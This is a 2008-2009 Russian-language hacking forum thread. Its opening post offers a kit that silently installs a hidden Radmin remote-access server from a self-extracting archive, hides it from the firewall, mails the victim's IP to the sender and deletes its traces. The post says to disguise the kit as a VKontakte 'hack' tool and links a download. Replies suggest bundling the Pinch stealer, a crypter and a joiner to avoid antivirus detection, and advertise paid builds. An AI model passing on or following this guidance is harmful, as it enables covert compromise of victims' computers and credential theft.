ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > АнтиАдмин
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Скрытый радмин + скрытая установка + ip на почту
  #1  
Старый 20.12.2008, 18:18
Аватар для qazer
qazer
Участник форума
Регистрация: 26.11.2008
Сообщений: 167
Провел на форуме:
1025333

Репутация: 112
По умолчанию Скрытый радмин + скрытая установка + ip на почту

Сборка от меня для тех кому лень перечитывать сотни страниц фака по этой теме.

Все файлы надо добавить в SFX архив и в свойствах указать выполнить после распаковки install.bat

далее при запуски архива...вы не увидите ничего)Это работа утилиты CMDow которая запускает cmd в скрытом режиме.

что же происходит в данный момент?

архив распаковывает файлы файлы для радмина копирует в windows, файлы почтовой утилиты в windows\system32\ , добавляет записи в реестре чтобы радминсервер не было видно,чтоб не ругался виндфаерволл, запускает радминсервер , и отдаёт команду на отсылку ip на ваш почтовый адрес.

после того,как программа выполнится,все распакованные файлы удаляются.

Как пользоваться?

В файле install.bat надо прописать адрес логин и пароль вашей почты,а так же строку с паролем от радмина (по умолчанию пароля нет).далее создаём самораспаковывающийся архив, и кидаем его жертве.

Чтобы не было так паливно,можно прописать в install.bat удаление самого архива и запуск какой-нибудь проги,установщик которой вы добавите в архив,например "Взлом_Вконтакте.exe"

Дописывайте,корректируйте под свои нужды,я лишь выкладываю основу,далее всё зависит от вашей фантазии

P.S. готовый sfx архив не возможно передать по почте,говорит найден вирус)как это обойти,каждый додумывается сам.


http://www.filehoster.ru/files/bx3443

никаких вирусов там нет,архив обычный
 
Ответить с цитированием

  #2  
Старый 05.01.2009, 01:32
Аватар для k0lbasa
k0lbasa
Постоянный
Регистрация: 25.05.2008
Сообщений: 367
Провел на форуме:
2352294

Репутация: 416
По умолчанию

отличная штука
 
Ответить с цитированием

  #3  
Старый 05.01.2009, 01:47
Аватар для cremator (c)
cremator (c)
Постоянный
Регистрация: 20.06.2008
Сообщений: 323
Провел на форуме:
1240829

Репутация: 165
Отправить сообщение для cremator (c) с помощью ICQ
По умолчанию

Кто тестил?
 
Ответить с цитированием

  #4  
Старый 07.01.2009, 17:49
Аватар для ex3me
ex3me
Участник форума
Регистрация: 07.01.2009
Сообщений: 186
Провел на форуме:
1247273

Репутация: 166
Отправить сообщение для ex3me с помощью ICQ
По умолчанию

использование батников палится антивирусниками... имхо - этот способ устарел с тех пор, как ушла из жизни винда 95/98, поэтому см пост http://forum.antichat.ru/showpost.php?p=1041809&postcount=227
 
Ответить с цитированием

  #5  
Старый 07.01.2009, 19:01
Аватар для SmaTR
SmaTR
Новичок
Регистрация: 07.01.2009
Сообщений: 6
Провел на форуме:
30714

Репутация: 0
По умолчанию

незнаю,всё проверил,каспер непалит,только вот ип на почту неприходит)) а тк у нас тут у всех ип динамический,приходится каждый раз просить прислать картинку в аське))))) есть какойнить способ узнать ип удаленно?
 
Ответить с цитированием

  #6  
Старый 07.01.2009, 19:13
Аватар для stopxaker
stopxaker
Постоянный
Регистрация: 06.09.2008
Сообщений: 459
Провел на форуме:
3687629

Репутация: 558
Отправить сообщение для stopxaker с помощью ICQ Отправить сообщение для stopxaker с помощью Yahoo
По умолчанию

Цитата:
Сообщение от SmaTR  
незнаю,всё проверил,каспер непалит,только вот ип на почту неприходит)) а тк у нас тут у всех ип динамический,приходится каждый раз просить прислать картинку в аське))))) есть какойнить способ узнать ип удаленно?
есть способ , я делаю так : радмин (моя сборка) +pinch, этот радмин перебивает уже установленный радмин на мой пароль и не виден в трее , что очень удобно .

2 qazer способ устарел , протестил на 6 компах везде палево , опять же говорю радмин (моя сборка) +pinch+криптор+джойнер и будет всё very good

2 qazer а то что писал +
 
Ответить с цитированием

  #7  
Старый 08.01.2009, 18:36
Аватар для ex3me
ex3me
Участник форума
Регистрация: 07.01.2009
Сообщений: 186
Провел на форуме:
1247273

Репутация: 166
Отправить сообщение для ex3me с помощью ICQ
По умолчанию

У меня сейчас заказ: создать сборку, в которой отправка IP жертвы будет производиться на номер ICQ. Выложу позже на Плати.ру - кто захочет, тот приобритет.
Спросите почему платно? Отвечу: после изменений в протоколе icq (ведь все обновляли квип до 8080? кто обновлял - поймет меня) довольно трудно написать что-то работающее, чтобы оно отправляло что-то куда-то (я использую делфи 7й версии)
 
Ответить с цитированием

  #8  
Старый 08.01.2009, 19:18
Аватар для B1t.exe
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708

Репутация: 208


По умолчанию

так не понял, как отправляет на почту IP ? SMTP (25 Порт?)? а если стоит файрвол и у клиента нет аутлук ? (например у меня не стоит никакого почтового клиента).
 
Ответить с цитированием

  #9  
Старый 08.01.2009, 19:42
Аватар для qazer
qazer
Участник форума
Регистрация: 26.11.2008
Сообщений: 167
Провел на форуме:
1025333

Репутация: 112
По умолчанию

там в сборке консольный почтовый клиент есть,который всё и отправляет юкстати там в настройках указан альтернативный порт (можно переделать на 25ый)
 
Ответить с цитированием

  #10  
Старый 08.01.2009, 20:28
Аватар для stopxaker
stopxaker
Постоянный
Регистрация: 06.09.2008
Сообщений: 459
Провел на форуме:
3687629

Репутация: 558
Отправить сообщение для stopxaker с помощью ICQ Отправить сообщение для stopxaker с помощью Yahoo
По умолчанию

Цитата:
Сообщение от ex3me  
У меня сейчас заказ: создать сборку, в которой отправка IP жертвы будет производиться на номер ICQ. Выложу позже на Плати.ру - кто захочет, тот приобритет.
Спросите почему платно? Отвечу: после изменений в протоколе icq (ведь все обновляли квип до 8080? кто обновлял - поймет меня) довольно трудно написать что-то работающее, чтобы оно отправляло что-то куда-то (я использую делфи 7й версии)

Я приобрету без разговора , давно уже юзаю твои сборки , доволен

оффтоп 2 ex3me стукнул в аську
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ